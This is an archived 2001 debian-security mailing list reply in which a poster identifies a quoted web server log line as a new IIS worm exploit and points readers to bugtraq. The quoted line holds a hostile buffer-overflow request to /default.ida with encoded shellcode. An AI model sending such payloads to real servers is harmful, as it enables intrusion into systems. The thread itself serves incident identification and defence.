Re: CGI Buffer Overflow?

To: debian-security@lists.debian.org
Subject: Re: CGI Buffer Overflow?
From: Alexander Reelsen <alex@rhwd.owl.de>
Date: Fri, 20 Jul 2001 00:58:22 +0200
Message-id: <[🔎] 20010720005822.A769@rhwd.owl.de>
Mail-followup-to: debian-security@lists.debian.org
In-reply-to: <[🔎] 3B574E66.9EC27245@brectanu.ais.vt.edu>

Hi

On Thu, Jul 19, 2001 at 05:17:26PM -0400, Brian Rectanus wrote:
> xxx.xxx.xxx.xxx - - [19/Jul/2001:14:28:23 -0400] "GET
> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9
> 090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0
> 078%u0000%u00=a  HTTP/1.0" 400 328
New IIS exploit (a worm flooding whitehouse.gov and infecting other hosts).
Check bugtraq/securityfocus for more.


MfG/Regards, Alexander

-- 
Alexander Reelsen   http://joker.rhwd.de
ref@linux.com       GnuPG: pub 1024D/F0D7313C  sub 2048g/6AA2EDDB
ref@tretmine.org    7D44 F4E3 1993 FDDF 552E  7C88 EE9C CBD1 F0D7 313C
Securing Debian:    http://joker.rhwd.de/doc/Securing-Debian-HOWTO

Reply to:

References:
- CGI Buffer Overflow?
  - From: Brian Rectanus <brectanu@vt.edu>

Prev by Date: Re: non-US security fixes URL
Next by Date: RE: CGI Buffer Overflow?
Previous by thread: CGI Buffer Overflow?
Next by thread: RE: CGI Buffer Overflow?
Index(es):
- Date
- Thread